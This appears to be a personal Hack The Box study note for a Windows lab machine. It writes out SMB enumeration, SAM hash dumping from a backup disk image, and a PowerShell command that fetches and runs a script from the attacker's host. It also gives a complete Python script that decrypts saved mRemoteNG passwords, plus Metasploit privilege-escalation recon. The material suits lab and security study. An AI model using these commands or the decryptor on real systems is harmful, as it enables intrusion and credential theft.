Hackthebox learning note 1

Scanning the target machine

using the script [https://github.com/21y4d/nmapAutomator] (recommended: it wraps the nmap phases below into one run)

nmap -sC -sV [target IP address] [more options can be added]

  • -sC: run the default NSE script set (same as --script=default)
  • -sV: probe open ports to identify the service and its version
  • -A: enable OS detection, version detection, script scanning, and traceroute
  • --open: only show open (or possibly open) ports

nmap --script all -p445 [target IP address]

  • --script all: run every NSE script against port 445; this is slow and noisy, and on 445 the smb-* scripts (smb-os-discovery, smb-enum-shares, smb-vuln-*) are usually all that is wanted

SMB enumeration

smbclient -L //[target IP address]

  • -L: list the shares available on a host (add -N to try a null session without being prompted for a password)

smbclient \\\\[target IP address]\\[sharename]

  • connect to a single share; the backslashes are doubled because the shell consumes one of each pair

Mounting files

mount -t cifs //[target IP address]/Backups /mnt/backup -o rw

  • -t: type of the file system (cifs for an SMB share)
  • -o: comma-separated list of mount options (rw mounts read-write; add guest for a share that allows anonymous access, otherwise mount prompts for a password)

Reading a VHD (Virtual Hard Disk)

7z l filename.vhd (only lists the files inside the image; it does not show their content)

  • l: list contents of archive

{apt-get install libguestfs-tools} (used to mount the image and read the files inside it)

guestmount --add [vhd image] --inspector --ro [mount point] -v

  • --add: add the disk image
  • --inspector: inspect the image and mount its filesystems automatically
  • --ro: mount read-only (nothing inside the backup gets modified)
  • -v: verbose output (-V, capital, prints the version)

samdump2 retrieves the boot key (syskey) from the SYSTEM hive and uses it to decrypt the password hashes stored in the SAM hive (Windows 2000/NT/XP/Vista and later). Inside the mounted image both hives live under Windows/System32/config/.

samdump2 SYSTEM SAM

Password hash format (pwdump style)

Username:RID:LM hash:NT hash::: (the last three fields are empty in samdump2 output)

If the LM hash is aad3b435b51404eeaad3b435b51404ee (starts with "aad3"), no LM hash is stored: LM hashing is disabled, which is the default on modern Windows, so there is nothing to crack in that field

If the NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0 (starts with "31d6"), the account has an empty password

Cracking the NT hash with [https://crackstation.net] (a lookup of precomputed hashes; it only succeeds when the password is already in its tables)

Transferring files to Windows

Recommended way [https://github.com/411Hall/JAWS]

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.12/jaws-enum.ps1','C:\Users\L4mpje\Desktop\jaws-enum.ps1')" {downloads the script from the attacking Linux host, which must be serving it over HTTP, onto the target}

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

Exploiting mRemoteNG (config file: C:\Users\[username]\AppData\Roaming\mRemoteNG\confCons.xml)

type confCons.xml (look for the Password attribute of each connection node; it is a base64 blob, not the plaintext)

[https://github.com/haseebT/mRemoteNG-Decrypt]

python3 mremote_decrypt.py -s "password string" (the base64 value from confCons.xml; the script decrypts it with mRemoteNG's default master password, so if the user set a custom master password it has to be supplied)
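What makes this "exploitable" is not a bug but the storage design: mRemoteNG encrypts saved passwords reversibly under a master password that defaults to the public value "mR3m", so anyone who can read confCons.xml as that user can recover them. The following is an added example (not the haseebT script or mRemoteNG's code) that walks the file and decrypts each connection's password using the scheme mRemoteNG uses for its AES/GCM config files: the key is PBKDF2-HMAC-SHA1(master password, salt, KdfIterations) with a 32-byte output, the Password attribute is base64(salt[16] || nonce[16] || ciphertext || tag[16]), and the salt doubles as the GCM associated data. It needs the `cryptography` package. The confCons.xml, hostname, username and password below are constructed (encrypted at import time by the same routine), not from a real host; older config versions that predate the AES/GCM format are not handled.

```python
"""Extract and decrypt connection passwords from an mRemoteNG confCons.xml."""
import base64
import hashlib
import os
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

DEFAULT_MASTER_PASSWORD = "mR3m"   # mRemoteNG's built-in default
DEFAULT_KDF_ITERATIONS = 1000      # default value of the KdfIterations attribute


def _derive_key(master_password: str, salt: bytes, iterations: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt,
                               iterations, dklen=32)


def decrypt_mremoteng(b64_blob: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                      iterations: int = DEFAULT_KDF_ITERATIONS) -> str:
    """Decrypt one Password attribute; raises InvalidTag on a wrong master password."""
    blob = base64.b64decode(b64_blob)
    if len(blob) < 48:                          # salt + nonce + tag at minimum
        raise ValueError("blob too short to be an mRemoteNG password")
    salt, nonce, ct_and_tag = blob[:16], blob[16:32], blob[32:]
    key = _derive_key(master_password, salt, iterations)
    # AESGCM.decrypt takes ciphertext||tag as one buffer; the salt is the AAD
    return AESGCM(key).decrypt(nonce, ct_and_tag, salt).decode("utf-8")


def decrypt_or_none(b64_blob: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                    iterations: int = DEFAULT_KDF_ITERATIONS) -> Optional[str]:
    """Same as decrypt_mremoteng but returns None for bad input or wrong password."""
    try:
        return decrypt_mremoteng(b64_blob, master_password, iterations)
    except (InvalidTag, ValueError):
        return None


def encrypt_mremoteng(plaintext: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                      iterations: int = DEFAULT_KDF_ITERATIONS) -> str:
    """Inverse of decrypt_mremoteng; used here only to build the sample file."""
    salt, nonce = os.urandom(16), os.urandom(16)
    key = _derive_key(master_password, salt, iterations)
    ct_and_tag = AESGCM(key).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_and_tag).decode("ascii")


def extract_credentials(xml_text: str,
                        master_password: str = DEFAULT_MASTER_PASSWORD
                        ) -> List[Dict[str, Optional[str]]]:
    """Walk every Connection node and return name/host/user/decrypted password."""
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", DEFAULT_KDF_ITERATIONS))
    creds: List[Dict[str, Optional[str]]] = []
    for node in root.iter("Node"):           # Node elements carry no namespace
        if node.get("Type") != "Connection":
            continue
        enc = node.get("Password") or ""
        creds.append({
            "name": node.get("Name"),
            "host": node.get("Hostname"),
            "user": node.get("Username"),
            "password": decrypt_or_none(enc, master_password, iterations) if enc else "",
        })
    return creds


# Constructed confCons.xml; the Password value is produced by encrypt_mremoteng above.
SAMPLE_PASSWORD = "S3cretPass!"
SAMPLE_CONFCONS = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="{DEFAULT_KDF_ITERATIONS}"
  FullFileEncryption="false" ConfVersion="2.6">
  <Node Name="DC01" Type="Connection" Protocol="RDP" Hostname="10.0.0.5"
    Username="Administrator" Password="{encrypt_mremoteng(SAMPLE_PASSWORD)}" />
  <Node Name="Servers" Type="Container" Expanded="True" />
</mrng:Connections>
"""

if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_CONFCONS):
        print(cred)
```

The KdfIterations attribute is read from the file rather than hard-coded because a user can raise it in the settings; a wrong iteration count, like a wrong master password, simply fails the GCM tag check, which is why the decrypt helper reports None instead of garbage.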

Windows exploit suggester (Metasploit's local_exploit_suggester: matches the session's OS and patch level against the local privilege-escalation modules)

use post/multi/recon/local_exploit_suggester

msf post(local_exploit_suggester) > set lhost [IP address] (optional; the module only needs a session)

msf post(local_exploit_suggester) > set session 1

msf post(local_exploit_suggester) > exploit

Windows Gather Applied Patches (lists installed hotfixes so missing KBs can be matched against known privilege-escalation exploits)

use post/windows/gather/enum_patches

msf post(enum_patches) > set session 1

msf post(enum_patches) > exploit

Sherlock [https://github.com/rasta-mouse/Sherlock]

(In the meterpreter session)

load powershell

powershell_import '/root/Desktop/Sherlock/Sherlock.ps1'

powershell_execute "Find-AllVulns"

JAWS – Just Another Windows (Enum) Script [https://github.com/411Hall/JAWS]

(In the meterpreter session)

upload /root/Desktop/jaws-enum.ps1 .

shell (drop from meterpreter into a Windows command prompt)

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

PowerSploit [https://github.com/PowerShellMafia/PowerSploit]

(In the meterpreter session)

load powershell

powershell_import '/root/Desktop/PowerSploit/Privesc/PowerUp.ps1'

powershell_execute Invoke-AllChecks

axebox

author: bs

Published by bsderek

We are just two new authors doing write-ups on cybersecurity topics to educate ourselves. We encourage you to leave a comment in areas where we can improve in terms of skills/knowledge. If we are incorrect in our write-up, please inform us and send us an article to read so we can better educate ourselves. Feel free to leave a comment. Hope you have a nice day!! And don't forget to hack your life away!!! Peace (00)
